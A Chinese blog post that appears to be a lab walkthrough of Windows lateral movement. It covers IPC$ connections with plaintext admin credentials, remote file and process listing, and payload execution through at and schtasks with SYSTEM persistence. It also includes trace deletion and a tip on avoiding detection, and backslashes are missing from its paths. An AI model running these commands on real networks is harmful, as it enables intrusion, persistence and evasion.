最近研究了一下ATT&CK的内网横向渗透，黑客很多时候能拿到一个站点的控制权限，但是距离最终的目标还有一定距离，所以就有了「横向渗透」这个关键词。说白了就是利用跳板机，感染内网其他主机，逐渐接近最终目标。在高级持续性威胁（APT）中尤为常见，被安全分析师津津乐道。本次实验呢，就是通过建立IPC来控制其他主机搞事情～

【软件安全】缓冲区溢出攻防 作者 ailx10

1、IPC共享命名管道下的远程访问

为了实现进程间通信而开放的命名管道，IPC可以通过验证用户名和密码，获得相应的权限。通常在管理远程计算机和查看计算机的共享资源时使用。

通过ipc$可以和目标机器建立连接，利用这个连接，不仅可以访问目标机器的文件，进行上传、下载，还可以在目标机器上运行其他命名。

ailx10

net use 192.168.160.135ipc$ "W2ngluoanquan" /user:HACKBIJIAdministrator

使用windows自带的工具获取远程主机信息

• dir命令

查看远程主机的C盘文件

dir 192.168.160.135C$

去 192.168.160.135 主机上查看一下C盘，一摸一样。

• tasklist命令

查看远程主机上运行的进程

tasklist /S 192.168.160.135 /U HACKBIJIAdministrator /P W2ngluoanquan

2、at计划任务

• at命令使用

at是windows自带的用于创建计划任务的命令，使用at命令可以在远程目标上创建计划任务，建立定时任务四部曲如下：

1. 使用net time 命令确定远程机器当前的系统时间
2. 使用copy命令将payload文件复制到远程目标机器中
3. 使用at命令定时启动该payload文件
4. 删除使用at命令创建计划任务的记录

步骤一：使用net time 命令确定远程机器当前的系统时间

net time 192.168.160.135

步骤二：使用copy命令将payload文件复制到远程目标机器中

copy calc.bat 192.168.160.135c$

步骤三：使用at命令定时启动该payload文件

在下午5点49分启动calc.bat批批处理任务

at 192.168.160.135 17:49:00 c:calc.bat

到点后，查看到出现了calc.exe进程，成功植入了定时任务，卡的要死。一定要控制好执行频率，否则肯定会被抓的。

步骤四：删除使用at命令创建计划任务的记录

黑客完成目的之后要清楚痕迹，所以要删除计划任务。

at 192.168.160.135 2 /delete

3、schtasks计划任务

schtasks命令比at命令更加强大、灵活。创建计划任务，该计划任务在开机时启动，运行c盘下的calc.bat批处理任务，运行权限是system。

schtasks /create /s 192.168.160.135 /tn ailx10_task /sc onstart /tr c:calc.bat /ru system /f  /u HACKBIJIAdministrator /p W2ngluoanquan

尝试立即运行这个计划任务，然后再次查看发现新增了一个calc.exe进程

schtasks /run /s 192.168.160.135 /i /tn "ailx10_task"  /u HACKBIJIAdministrator /p W2ngluoanquan 

最后删除计划任务

schtasks /delete /s 192.168.160.135 /tn "ailx10_task" /f  /U HACKBIJIAdministrator  /P W2ngluoanquan

• /u 域账号
• /p 密码
• /f 强制执行

最后的最后，删除$ipc，结束战斗～

net use 192.168.160.135ipc$ /del /y

本篇完～